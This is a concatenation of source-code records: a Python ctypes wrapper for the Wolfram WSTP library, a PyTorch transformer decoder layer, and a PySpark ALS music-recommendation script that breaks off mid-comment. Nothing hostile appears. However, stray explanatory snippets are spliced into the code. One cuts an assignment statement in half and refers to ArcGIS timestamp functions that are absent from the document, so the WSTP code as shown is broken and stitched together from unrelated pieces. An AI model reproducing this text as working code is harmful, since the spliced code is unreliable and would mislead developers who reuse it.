pass\n\nclass WSTPTempLoopbackLink:\n '''\n Instantiated by WSTPTempLoobackContext\n '''\n __slots__ = ('penv', 'plnk')\n def __init__(self, penv):\n self.penv = penv\n\n def __enter__(self):\n self. 
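get_data above converts ArcGIS epoch-millisecond timestamps to dates, and sanity_checks enforces a non-decreasing cumulative series. A small pandas sketch of both steps on made-up values:

import pandas as pd

ms = pd.Series([1583020800000, 1583107200000, 1583193600000])
dates = pd.to_datetime(ms, unit="ms").dt.strftime("%Y-%m-%d")
print(dates.tolist())                  # ['2020-03-01', '2020-03-02', '2020-03-03']

totals = pd.Series([75, 520, 520, 1087])
assert totals.is_monotonic_increasing  # cumulative counts must never decrease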
plnk = WSLoopbackOpen(self.penv)\n return self\n\n def __exit__(self, errtype, err, traceback):\n if not err:\n WSClose(self.plnk)\n\nclass WSTPTempLoopbackContext:\n '''\n Some WSTP API requires a temporary loopback link to store data,\n this class provides a simple and safe way to do that.\n\n Example:\n penv = WSInitialize()\n lbctx = WSTPThrowawayLoopbackContext(penv)\n with lbctx.temp_link() as lb:\n plnk = lb.plnk\n WSPutXXX(plnk, ...)\n WSGetXXX(plnk, ...)\n ...\n '''\n __slots__ = ('penv')\n def __init__(self, penv):\n assert isinstance(penv, WSLINK_t)\n # make copy to avoid cross reference causing\n # failure to call __del__ in certain objects\n self.penv = cast(penv, WSLINK_t)\n\n def temp_link(self):\n return WSTPTempLoopbackLink(self.penv)\n\ndef check_error(errno_, msg=''):\n if errno_ != WSEOK:\n raise WSTPError(errno_, msg)\n\ndef check_link_error(lnk_p, msg=None, msg_prefix=None):\n errno_ = WSError(lnk_p)\n msg = WSErrorMessage(lnk_p) if msg is None else msg\n if msg_prefix is not None:\n msg = '%s: %s' % (msg_prefix, msg)\n check_error(errno_.value, msg)\n\ndef decode_pointer_buffer(ptr, nbytes, encoding='utf-8'):\n if not ptr:\n return ''\n vptr = cast(ptr, c_void_p)\n buf = (c_ubyte * nbytes).from_address(vptr.value)\n if encoding is None:\n return bytes(buf)\n else:\n return codecs.decode(buf, encoding=encoding)\n\n# ==== C API wrappers\n\ndef WSInitialize(env_p=0):\n return c_void_p(naked.__WSInitialize(env_p))\n\ndef WSDeinitialize(env_p):\n naked.__WSDeinitialize(env_p)\n\ndef WSOpenArgcArgv(env_p, *args):\n argc = c_int(len(args))\n argv = (c_char_p * len(args))()\n err = WSERRNO_t()\n for i,s in enumerate(args):\n argv[i] = s.encode('utf-8')\n lnk_p = naked.__WSOpenArgcArgv(env_p, argc, argv, byref(err))\n check_error(err.value, 'WSOpenArgcArgv')\n return lnk_p\n\ndef WSOpenString(env_p, cmd_line):\n err = WSERRNO_t()\n lnk_p = WSLINK_t(naked.__WSOpenString(\n env_p, cmd_line.encode('utf-8'), byref(err)))\n check_error(err.value, \"WSOpenString\")\n return lnk_p\n\ndef WSLoopbackOpen(env_p):\n err = WSERRNO_t()\n lnk_p = WSLINK_t(naked.__WSLoopbackOpen(env_p, byref(err)))\n check_error(err.value, \"WSLoopbackOpen\")\n return lnk_p\n\ndef WSActivate(lnk_p):\n if not naked.__WSActivate(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSActivate\")\n\ndef WSDuplicateLink(lnk_p, name):\n err = WSERRNO_t()\n lnk_p = naked.__WSDuplicateLink(\n lnk_p, name.encode('utf-8'), byref(err))\n check_error(err.value, 'WSDuplicateLink')\n return lnk_p\n\ndef WSClose(lnk_p):\n naked.__WSClose(lnk_p)\n\ndef WSLinkName(lnk_p):\n return naked.__WSLinkName(lnk_p).value\n\nWSToLinkID = naked.__WSToLinkID\nWSFromLinkID = naked.__WSFromLinkID\n\ndef WSVersionNumbers(env_p):\n i, r, b = c_int(), c_int(), c_int()\n naked.__WSVersionNumbers(env_p, byref(i), byref(r), byref(b))\n return (i.value, r.value, b.value)\n\ndef WSNewLinkServer(env_p, ipaddr, port):\n err = WSERRNO_t()\n if isinstance(ipaddr, str):\n ipaddr = ipaddr.encode()\n assert isinstance(ipaddr, bytes)\n assert isinstance(port, int)\n server_p = naked.__WSNewLinkServerWithPortAndInterface(\n env_p, c_ushort(port), cast(ipaddr, c_char_p), c_void_p(0), byref(err))\n if err.value != WSEOK:\n raise WSTPError(err.value, 'WSNewLinkServer')\n return server_p\n\ndef WSShutdownLinkServer(server_p):\n naked.__WSShutdownLinkServer(server_p)\n\ndef WSRegisterCallbackFunctionWithLinkServer(server_p, fn):\n '''\n Args:\n server_p: pointer to link server\n fn: python callable\n '''\n if not isinstance(fn ,WSLINKSERVERCALLBACK_t):\n fn = 
WSLINKSERVERCALLBACK_t(fn)\n naked.__WSRegisterCallbackFunctionWithLinkServer(server_p, fn)\n return fn\n\ndef WSWaitForNewLinkFromLinkServer(server_p):\n '''\n Returns: pointer to link\n '''\n err = WSERRNO_t()\n lnk_p = naked.__WSWaitForNewLinkFromLinkServer(server_p, byref(err))\n check_error(err.value, 'WSWaitForNewLinkFromLinkServer')\n return lnk_p\n\ndef WSNewPacket(lnk_p):\n if not naked.__WSNewPacket(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSNewPacket\")\n\ndef WSEndPacket(lnk_p):\n if not naked.__WSEndPacket(lnk_p):\n check_link_error(lnk_p, msg_prefix=\"WSEndPacket\")\n\ndef WSPutType(lnk_p, tok):\n if not naked.__WSPutType(lnk_p, tok):\n check_link_error(lnk_p, msg_prefix='WSPutType')\n\ndef WSPutNext(lnk_p, tok):\n if not naked.__WSPutNext(lnk_p, tok):\n check_link_error(lnk_p, msg_prefix='WSPutNext')\n\ndef WSPutSize(lnk_p, n):\n if not naked.__WSPutSize(lnk_p, n):\n check_link_error(lnk_p, msg_prefix='WSPutSize')\n\ndef WSPutData(lnk_p, s):\n '''\n Args:\n lnk_p: pointer to link\n s: buffer-like\n '''\n if not naked.__WSPutData(lnk_p, cast(s, c_char_p), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutData')\n\ndef WSPutRawData(lnk_p, s):\n '''\n Args:\n lnk_p: pointer to link\n s: buffer-like\n '''\n if not naked.__WSPutData(lnk_p, cast(s, POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutRawData')\n\ndef WSPutInteger8(lnk_p, i):\n if not naked.__WSPutInteger8(lnk_p, c_uint8(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger8\")\n\ndef WSGetInteger8(lnk_p):\n i = c_int8()\n if not naked.__WSGetInteger8(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger8\")\n return i.value\n\ndef WSPutInteger16(lnk_p, i):\n if not naked.__WSPutInteger16(lnk_p, c_int32(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger16\")\n\ndef WSGetInteger16(lnk_p):\n i = c_int16()\n if not naked.__WSGetInteger16(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger16\")\n return i.value\n\ndef WSPutInteger32(lnk_p, i):\n if not naked.__WSPutInteger32(lnk_p, c_int32(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger32\")\n\ndef WSGetInteger32(lnk_p):\n i = c_int32()\n if not naked.__WSGetInteger32(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger32\")\n return i.value\n\ndef WSPutInteger64(lnk_p, i):\n if not naked.__WSPutInteger64(lnk_p, c_int64(i)):\n check_link_error(lnk_p, msg_prefix=\"WSPutInteger64\")\n\ndef WSGetInteger64(lnk_p):\n i = c_int64()\n if not naked.__WSGetInteger64(lnk_p, byref(i)):\n check_link_error(lnk_p, msg_prefix=\"WSGetInteger64\")\n return i.value\n\ndef WSPutInteger8List(lnk_p, li):\n raise NotImplementedError() # TODO\n\ndef WSGetInteger8List(lnk_p, li):\n raise NotImplementedError() # TODO\n\ndef WSReleaseInteger8List(lnk_p, li_p):\n raise NotImplementedError() # TODO\n\ndef WSPutReal64(lnk_p, f):\n if not naked.__WSPutReal64(lnk_p, f):\n check_link_error(lnk_p, msg_prefix=\"WSPutReal64\")\n\ndef WSGetReal64(lnk_p):\n f = c_double()\n if not naked.__WSGetReal64(lnk_p, byref(f)):\n check_link_error(lnk_p, msg_prefix=\"WSGetReal64\")\n return f.value\n\ndef WSPutString(lnk_p, s, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n s: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(s, str)\n sb = s.encode('utf-8')\n if not naked.__WSPutUTF8String(\n lnk_p, cast(sb, POINTER(c_ubyte)), len(sb)):\n check_link_error(lnk_p, msg_prefix='WSPutUTF8String')\n 
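WSTPTempLoopbackContext above (its docstring still refers to it by an older name, WSTPThrowawayLoopbackContext) manages a scratch loopback link. A usage sketch built only from the wrappers defined in this module; it assumes a working WSTP installation, and the single-integer round trip is illustrative:

penv = WSInitialize()
ctx = WSTPTempLoopbackContext(penv)
with ctx.temp_link() as lb:
    WSPutInteger32(lb.plnk, 42)     # a loopback link echoes what is written to it...
    print(WSGetInteger32(lb.plnk))  # ...so the value can be read straight back: 42
WSDeinitialize(penv)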
return\n assert isinstance(s, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutString(lnk_p, s):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8String,\n 'utf-16': naked.__WSPutUTF16String,\n 'utf-32': naked.__WSPutUTF32String,\n }[encoding]\n if not fn_put(lnk_p, s, len(s)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetString(lnk_p, encoding=None):\n '''\n Returns string if encoding is None, bytes otherwise\n Args:\n lnk_p: pointer to link\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n msg = WSGetString(lnk_p, encoding='utf-8').decode('utf-8')\n elif encoding == 'wolfram':\n sptr = c_char_p()\n if not naked.__WSGetString(lnk_p, byref(sptr)):\n check_link_error(lnk_p, msg_prefix=\"WSGetString\")\n msg = sptr.value\n naked.__WSReleaseString(sptr)\n else:\n elem_t, fn_getstr, fn_release = {\n 'utf-8': (c_ubyte, naked.__WSGetUTF8String, naked.__WSReleaseUTF8String),\n 'utf-16': (c_uint16, naked.__WSGetUTF16String, naked.__WSReleaseUTF16String),\n 'utf-32': (c_uint32, naked.__WSGetUTF32String, naked.__WSReleaseUTF32String),\n }[encoding]\n nbytes, nchars = c_int(), c_int()\n sptr = POINTER(elem_t)()\n if not fn_getstr(lnk_p, byref(sptr), byref(nbytes), byref(nchars)):\n check_link_error(lnk_p, msg_prefix=fn_getstr.__name__)\n msg = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n fn_release(lnk_p, sptr, nbytes)\n return msg\n\ndef WSPutByteString(lnk_p, s:bytes):\n if not naked.__WSPutByteString(lnk_p, cast(s, POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix=\"WSPutByteString\")\n\ndef WSGetByteString(lnk_p):\n sptr = POINTER(c_ubyte)()\n nbytes = c_long()\n if not naked.__WSGetByteString(lnk_p, byref(sptr), byref(nbytes), 0):\n check_link_error(lnk_p, msg_prefix=\"WSGetByteString\")\n bs = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n naked.__WSReleaseByteString(lnk_p, sptr)\n return bs\n\ndef WSPutSymbol(lnk_p, s, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n s: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(s, str)\n if not naked.__WSPutUTF8Symbol(lnk_p, cast(s.encode('utf-8'), POINTER(c_ubyte)), len(s)):\n check_link_error(lnk_p, msg_prefix='WSPutUTF8Symbol')\n return\n assert isinstance(s, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutSymbol(lnk_p, s):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8Symbol,\n 'utf-16': naked.__WSPutUTF16Symbol,\n 'utf-32': naked.__WSPutUTF32Symbol,\n }[encoding]\n sptr = cast(s, fn_put.argtypes[1])\n if not fn_put(lnk_p, sptr, len(s)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetSymbol(lnk_p, encoding=None):\n '''\n Returns string if encoding is None, bytes otherwise\n Args:\n lnk_p: pointer to link\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n msg = WSGetSymbol(lnk_p, encoding='utf-8').decode('utf-8')\n elif encoding == 'wolfram':\n sptr = c_char_p()\n if not naked.__WSGetSymbol(lnk_p, byref(sptr)):\n check_link_error(lnk_p, msg_prefix=\"WSGetSymbol\")\n msg = sptr.value\n naked.__WSReleaseSymbol(sptr)\n else:\n elem_t, fn_getstr, fn_release = {\n 'utf-8': (c_ubyte, naked.__WSGetUTF8Symbol, naked.__WSReleaseUTF8Symbol),\n 'utf-16': (c_uint16, naked.__WSGetUTF16Symbol, naked.__WSReleaseUTF16Symbol),\n 
'utf-32': (c_uint32, naked.__WSGetUTF32Symbol, naked.__WSReleaseUTF32Symbol),\n }[encoding]\n nbytes, nchars = c_int(), c_int()\n sptr = POINTER(elem_t)()\n if not fn_getstr(lnk_p, byref(sptr), byref(nbytes), byref(nchars)):\n check_link_error(lnk_p, msg_prefix=fn_getstr.__name__)\n msg = decode_pointer_buffer(sptr, nbytes.value, encoding=None)\n fn_release(lnk_p, sptr, nbytes)\n return msg\n\ndef WSPutFunction(lnk_p, fname, nargs, encoding=None):\n '''\n Args:\n lnk_p: pointer to link\n fname: string if encoding is None, bytes otherwise\n encoding: None(default), \"wolfram\", \"utf-8\", \"utf-16\", \"utf-32\"\n '''\n if encoding is None:\n assert isinstance(fname, str)\n fname_s = fname.encode('utf-8')\n if not naked.__WSPutUTF8Function(\n lnk_p, cast(fname_s, POINTER(c_ubyte)),\n c_int(len(fname_s)), c_int(nargs)):\n check_link_error(lnk_p, 'WSPutUTF8Function')\n return\n assert isinstance(fname, bytes)\n if encoding == 'wolfram':\n if not naked.__WSPutFunction(lnk_p, fname, nargs):\n check_link_error(lnk_p, msg_prefix='WSPutString')\n else:\n fn_put = {\n 'utf-8': naked.__WSPutUTF8Function,\n 'utf-16': naked.__WSPutUTF16Function,\n 'utf-32': naked.__WSPutUTF32Function,\n }[encoding]\n ptr = cast(fname, fn_put.argtypes[1])\n if not fn_put(lnk_p, ptr, c_int(len(fname)), c_int(nargs)):\n check_link_error(lnk_p, msg_prefix=fn_put.__name__)\n\ndef WSGetFunction(lnk_p, encoding=None):\n '''\n Returns (head, argcount)\n head is string if encoding is None, bytes otherwise\n\n Args:\n lnk_p: C pointer to link object\n encoding: None, 'utf-8', 'utf-16', 'utf-32',\n '''\n # TODO add encoding support\n argcount_i = c_int()\n head_p = c_char_p()\n if not naked.__WSGetFunction(lnk_p, byref(head_p), byref(argcount_i)):\n check_link_error(lnk_p, msg_prefix='WSGetFunction')\n return head_p.value.decode('utf-8'), argcount_i.value\n # FIXME below is a hacky/buggy impl, should call WSGet*Function after symbol not exported\n # bug is resolved. 
Also the following code cause memory corruption\n '''\n if encoding == 'wolfram':\n argcount_i = c_int()\n phead = c_char_p()\n if not naked.__WSGetFunction(lnk_p, byref(phead), byref(argcount_i)):\n check_link_error(lnk_p, msg_prefix='WSGetFunction')\n head = phead.value.decode('utf-8')\n argcount = argcount_i.value\n naked.__WSReleaseSymbol(lnk_p, phead)\n else:\n # since getter functions are missing from DLL, have to use this hack\n WSGetNext(lnk_p)\n argcount = WSGetArgCount(lnk_p)\n head = WSGetSymbol(lnk_p, encoding=encoding)\n return head, argcount\n '''\n\ndef WSGetNext(lnk_p):\n typ = naked.__WSGetNext(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetNext error\")\n return typ\n\ndef WSGetNextRaw(lnk_p):\n typ = naked.__WSGetNextRaw(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetNextRaw error\")\n return typ\n\ndef WSGetType(lnk_p):\n typ = naked.__WSGetType(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetType error\")\n return typ\n\ndef WSGetArrayType(lnk_p):\n '''\n Returns: (leaf_token, shape:tuple(int...), heads:tuple(str...))\n '''\n # does not call naked.__WSGetArrayType,\n # because array_meterp is opaque\n head_li = []\n shape_li = []\n leaf_token = None\n mrk_p = WSCreateMark(lnk_p)\n def load_tensor_axis(): # closure\n head, narg = WSGetFunction(lnk_p)\n head_li.append(head)\n shape_li.append(narg)\n load_tensor_axis()\n while True:\n tok = WSGetRawType(lnk_p)\n if tok == WSTKFUNC:\n load_tensor_axis()\n else:\n leaf_token = tok\n break\n WSSeekToMark(lnk_p, mrk_p)\n WSDestroyMark(lnk_p, mrk_p)\n return leaf_token, tuple(shape_li), tuple(head_li)\n\ndef WSGetRawType(lnk_p):\n typ = naked.__WSGetRawType(lnk_p)\n if WSTKERR == typ:\n raise RuntimeError(\"WSGetRawType error\")\n return typ\n\ndef WSGetArgCount(lnk_p):\n count = c_int()\n if not naked.__WSGetArgCount(lnk_p, byref(count)):\n check_link_error(lnk_p, msg_prefix=\"WSGetArgCount\")\n return count.value\n\ndef WSBytesToGet(lnk_p):\n nbytes = c_int()\n if not naked.__WSBytesToGet(lnk_p, byref(nbytes)):\n check_link_error(lnk_p, msg_prefix='WSBytesToGet')\n return nbytes.value\n\ndef WSRawBytesToGet(lnk_p):\n nbytes = c_int()\n if not naked.__WSRawBytesToGet(lnk_p, byref(nbytes)):\n check_link_error(lnk_p, msg_prefix='WSRawBytesToGet')\n return nbytes.value\n\ndef WSGetRawData(lnk_p, size):\n '''\n Returns: bytearray\n Args:\n lnk_p: pointer to link\n size: int\n '''\n got_i = c_int()\n total_got = 0\n buf = bytes(size)\n cptr = c_char_p(buf)\n vptr_value = cast(cptr, c_void_p).value\n bufptr_t = POINTER(c_ubyte)\n while total_got < size:\n if not naked.__WSGetRawData(\n lnk_p, cast(vptr_value + total_got, bufptr_t),\n size, byref(got_i)\n ):\n check_link_error(lnk_p, msg_prefix='WSGetRawData')\n total_got += got_i.value\n return buf\n\ndef WSError(lnk_p):\n return WSERRNO_t(naked.__WSError(lnk_p))\n\ndef WSErrorMessage(lnk_p, encoding='utf-8'):\n encoding = encoding.lower()\n if encoding == 'ascii':\n sptr = naked.__WSErrorMessage(lnk_p)\n if not sptr:\n return ''\n msg = cast(sptr, c_char_p).value.decode(encoding)\n naked.__WSReleaseErrorMessage(lnk_p, sptr)\n else:\n msglen = c_int()\n fn_errmsg, fn_release = {\n 'utf-8': (\n naked.__WSUTF8ErrorMessage, naked.__WSReleaseUTF8ErrorMessage),\n 'utf-16': (\n naked.__WSUTF16ErrorMessage, naked.__WSReleaseUTF16ErrorMessage),\n 'utf-32': (\n naked.__WSUTF32ErrorMessage, naked.__WSReleaseUTF32ErrorMessage),\n }[encoding]\n sptr = fn_errmsg(lnk_p, byref(msglen))\n msg = decode_pointer_buffer(sptr, msglen.value, encoding=encoding)\n 
naked.__WSReleaseUTF8ErrorMessage(lnk_p, sptr, msglen)\n return msg\n\ndef WSReady(lnk_p):\n return bool(naked.__WSReady(lnk_p))\n\ndef WSFlush(lnk_p):\n if not naked.__WSFlush(lnk_p):\n check_link_error(lnk_p, msg_prefix='WSFlush')\n\ndef WSCreateMark(lnk_p):\n mark_p = naked.__WSCreateMark(lnk_p)\n if not mark_p:\n raise RuntimeError('WSCreateMark: got NULL mark pointer, failed')\n return mark_p\n\ndef WSSeekToMark(lnk_p, mrk_p, offset=0):\n new_mrk_p = naked.__WSSeekMark(lnk_p, mrk_p, c_int(offset))\n if not new_mrk_p:\n raise RuntimeError('WSSeekToMark: got NULL mark pointer, failed')\n return new_mrk_p\n\ndef WSDestroyMark(lnk_p, mrk_p):\n naked.__WSDestroyMark(lnk_p, mrk_p)\n\ndef WSWaitForLinkActivity(lnk_p):\n if not naked.__WSWaitForLinkActivity(lnk_p):\n check_link_error(lnk_p, msg_prefix='WSWaitForLinkActivity')\n","sub_path":"wstp/lowrapper.py","file_name":"lowrapper.py","file_ext":"py","file_size_in_byte":19862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"518818401","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Wed Jan 9 18:28:43 2019\n# @Author : JRP - Ruipeng Jia\n\nfrom torch import nn\n\n# from modules.attention_multi_head import MultiHeadAttention as Attention\nfrom modules.attention_dot_product import DotProductAttention as Attention\nfrom modules.positional_wise_feedforward import PositionalWiseFeedForward\n\n\nclass DecoderLayer(nn.Module):\n\n def __init__(self, args):\n super(DecoderLayer, self).__init__()\n self.args = args\n\n self.attention = Attention(self.args)\n self.feed_forward = PositionalWiseFeedForward(self.args)\n\n def forward(self, dec_input, enc_outputs, non_pad_mask=None, self_attn_mask=None, context_attn_mask=None):\n # dec_input: (B, L_q, D), Embedded input tensor\n # enc_outputs: (B, L_k, D), Encoder's output\n # self_attn_mask: (B, L_q, L_k), pad_mask + seq_mask\n # context_attn_mask: (B, L_q, L_k), Padding mask tensor\n\n dec_output, self_attention = self.attention(dec_input, dec_input, dec_input, self_attn_mask) # self attention; all inputs are decoder inputs\n dec_output *= non_pad_mask\n\n dec_output, context_attention = self.attention(dec_output, enc_outputs, enc_outputs, context_attn_mask) # context attention; query is decoder's outputs, key and value are encoder's inputs\n dec_output *= non_pad_mask\n\n dec_output = self.feed_forward(dec_output) # decoder's output, or context\n dec_output *= non_pad_mask\n\n return dec_output, self_attention, context_attention # (B, L, D)\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/sublayers/transformer_decoder_layer.py","file_name":"transformer_decoder_layer.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168932582","text":"# import libraries\nimport os\n\nfrom pyspark.shell import sqlContext\nfrom pyspark.sql.types import *\nfrom pyspark.sql import functions as F\n\nfrom pyspark.ml.recommendation import ALS\nfrom pyspark.ml.evaluation import RegressionEvaluator\n\n\n# list directories\nfiles_path = '../DataSet/' # File path here ../DataSet/ #../MDM_Project/Dataset/\n\ntriplets_file = files_path + 'train_triplets.txt'\nsongs2tracks_file = files_path + 'song_to_tracks.txt'\nmetadata_file = files_path + 'track_metadata.csv'\n\n# Handle Windows.\nif os.path.sep != '/':\n triplets_file = triplets_file.replace('/', os.path.sep)\n songs2tracks_file = 
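The DecoderLayer record above expects self_attn_mask to combine a padding mask with a look-ahead (sequence) mask. A minimal PyTorch sketch of the look-ahead half; the boolean convention (True means the position is blocked) is an assumption for illustration, not taken from that repository:

import torch

def look_ahead_mask(seq_len):
    # True above the diagonal: position i may not attend to positions > i
    return torch.triu(torch.ones(seq_len, seq_len, dtype=torch.bool), diagonal=1)

print(look_ahead_mask(4))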
songs2tracks_file.replace('/', os.path.sep)\n metadata_file = metadata_file.replace('/', os.path.sep)\n\n# Creating schema so the cluster only runs through the data once\ntriplets_schema = StructType(\n [StructField('userId', StringType()),\n StructField('songId', StringType()),\n StructField('Plays', IntegerType())]\n)\nsongs2tracks_schema = StructType(\n [StructField('songId', StringType()),\n StructField('trackId', StringType())]\n)\nmetadata_schema = StructType(\n [StructField('trackId', StringType()),\n StructField('title', StringType()),\n StructField('songId', StringType()),\n StructField('release', StringType()),\n StructField('artist_id', StringType()),\n StructField('artist_mbid', StringType()),\n StructField('artist_name', StringType()),\n StructField('duration', DoubleType()),\n StructField('artist_familiarity', DoubleType()),\n StructField('artist_hotttness', DoubleType()),\n StructField('year', IntegerType()),\n StructField('track_7digitalid', IntegerType()),\n StructField('shs_perf', DoubleType()),\n StructField('shs_work', DoubleType())]\n)\n\n# load the data into DataFrames\nplays_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter='\\t', header=True, inferSchema=False) \\\n .schema(triplets_schema) \\\n .load(triplets_file)\n\nsongs2tracks_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter=',', header=True, inferSchema=False) \\\n .schema(songs2tracks_schema) \\\n .load(songs2tracks_file)\n\nmetadata_df = sqlContext.read.format('com.databricks.spark.csv') \\\n .options(delimiter=',', header=True, inferSchema=False) \\\n .schema(metadata_schema) \\\n .load(metadata_file)\n\n# change ids from strings to integers\nuserId_change = plays_df.select('userId').distinct().select('userId',F.monotonically_increasing_id().alias('new_userId'))\nuser_als_id_LUT = sqlContext.createDataFrame(userId_change.rdd.map(lambda x: x[0]).zipWithIndex(), StructType([StructField(\"userId\", StringType(), True),StructField(\"user_als_id\", IntegerType(), True)]))\n\nsongId_change = plays_df.select('songId').distinct().select('songId', F.monotonically_increasing_id().alias('new_songId'))\nsong_als_id_LUT = sqlContext.createDataFrame(songId_change.rdd.map(lambda x: x[0]).zipWithIndex(), StructType([StructField(\"songId\", StringType(), True),StructField(\"song_als_id\", IntegerType(), True)]))\n\n# RUN BELOW TWO LINES TO CHECK IF THE NEW USER_ID, SONG_ID GENERATED PROPERLY\n# user_als_id_LUT.show(5)\n# song_als_id_LUT.show(5)\n\n# Get total unique users and songs\nunique_users = user_als_id_LUT.count()\nunique_songs = song_als_id_LUT.count()\nprint('Number of unique users: {0}'.format(unique_users))\nprint('Number of unique songs: {0}'.format(unique_songs))\n\n# Joining the new ID's to the Plays_df\nplays_df_2 = plays_df.join(user_als_id_LUT,'userId').join(song_als_id_LUT,'songId')\n\n# remove half users to make more manageable\nplays_df_2 = plays_df_2.filter(plays_df_2.user_als_id < unique_users / 2)\n\n# Summary of each DataFrame\nplays_df_2.cache()\nplays_df_2.show(5)\n\nsongs2tracks_df.cache()\nsongs2tracks_df.show(5)\n\nmetadata_df.cache()\nmetadata_df.show(5)\n\n#Total Listens(plays) of Each SongID\nTotal_listens = plays_df_2.groupBy('songId') \\\n .agg(F.count(plays_df_2.Plays).alias('User_Count'),\n F.sum(plays_df_2.Plays).alias('Total_Plays')) \\\n .orderBy('Total_Plays', ascending = False)\n\nprint('Total Listens of Each SONG_ID:')\nTotal_listens.show(3, truncate=False)\n\n# Joining with metadata to get artist and song title for the 
Total_Listens\nSong_names = Total_listens.join(metadata_df, 'songId' ) \\\n .filter('User_Count >= 200') \\\n .select('artist_name', 'title', 'songId', 'User_Count','Total_Plays') \\\n .orderBy('Total_Plays', ascending = False)\n\nprint('Complete Details of Songs Listened')\nSong_names.show(20, truncate = False)\n\n# We'll hold out 60% for training, 20% of our data for validation, and leave 20% for testing\nseed = 180229192\n(split_1, split_2, split_3) = plays_df_2.randomSplit([0.6, 0.2, 0.2], seed = seed)\n\n# Let's cache these datasets for performance\ntrain_set = split_1.cache()\nvalidation_set = split_2.cache()\ntest_set = split_3.cache()\n\nprint('Training: {0}, validation: {1}, test: {2}\\n'.format(\n train_set.count(), validation_set.count(), test_set.count())\n)\ntrain_set.show(5)\nvalidation_set.show(5)\ntest_set.show(5)\n\n# Number of plays needs to be double type\nvalidation_set = validation_set.withColumn(\"Plays\", validation_set[\"Plays\"].cast(DoubleType()))\nvalidation_set.show(5)\n\n## MODEL GENERATION (Alternating Least Squares)\n\n# initialising our First ALS learner\nals_01 = ALS()\n# Setting the parameters for the method\nals_01.setMaxIter(5)\\\n .setSeed(seed)\\\n .setItemCol(\"song_als_id\")\\\n .setRatingCol(\"Plays\")\\\n .setUserCol(\"user_als_id\")\n\n# computing an evaluation metric for our test dataset\n# We Create an RMSE evaluator using the label and predicted columns\n\nreg_eval = RegressionEvaluator(predictionCol=\"prediction\", labelCol=\"Plays\", metricName=\"rmse\")\n\ntolerance = 0.03\nranks = [4, 8, 12, 16]\nregParams = [0.15, 0.2, 0.25]\nerrors = [[0]*len(ranks)]*len(regParams)\nmodels = [[0]*len(ranks)]*len(regParams)\nerr = 0\nmin_error = float('inf')\nbest_rank = -1\n\ni = 0\nfor regParam in regParams:\n j = 0\n for rank in ranks:\n # Set the rank here:\n als_01.setParams(rank = rank, regParam = regParam)\n # Create the model with these parameters.\n model = als_01.fit(train_set)\n # Run the model to create a prediction. 
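One genuine pitfall in the grid search above: errors = [[0]*len(ranks)]*len(regParams) (and the matching models line) builds an outer list whose rows all alias a single inner list, so models[i][j] = model clobbers every row and models[best_params[0]][best_params[1]] is not guaranteed to be the best model. A short demonstration plus the list-comprehension fix:

ranks, regParams = [4, 8], [0.15, 0.2]

aliased = [[0] * len(ranks)] * len(regParams)
aliased[0][0] = 9.9
print(aliased)        # [[9.9, 0], [9.9, 0]]: every row changed

fixed = [[0] * len(ranks) for _ in regParams]
fixed[0][0] = 9.9
print(fixed)          # [[9.9, 0], [0, 0]]: rows are independent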
Predict against the validation_df.\n predictions = model.transform(validation_set)\n\n # Remove NaN values from prediction (due to SPARK-14489)\n predicted_plays = predictions.filter(predictions.prediction != float('nan'))\n predicted_plays = predicted_plays.withColumn(\"prediction\", F.abs(F.round(predicted_plays[\"prediction\"],0)))\n\n # Run the previously created RMSE evaluator, reg_eval, on the predicted_plays DataFrame\n error = reg_eval.evaluate(predicted_plays)\n errors[i][j] = error\n models[i][j] = model\n print ('For rank :',rank, ' regularization parameter:', regParam,' the RMSE is', error)\n if error < min_error:\n min_error = error\n best_params = [i,j]\n j += 1\n i += 1\n\nals_01.setRegParam(regParams[best_params[0]])\nals_01.setRank(ranks[best_params[1]])\nprint ('The best model was trained with regularization parameter %s' % regParams[best_params[0]])\nprint ('The best model was trained with rank %s' % ranks[best_params[1]])\nmy_model = models[best_params[0]][best_params[1]]\n\n#predicted 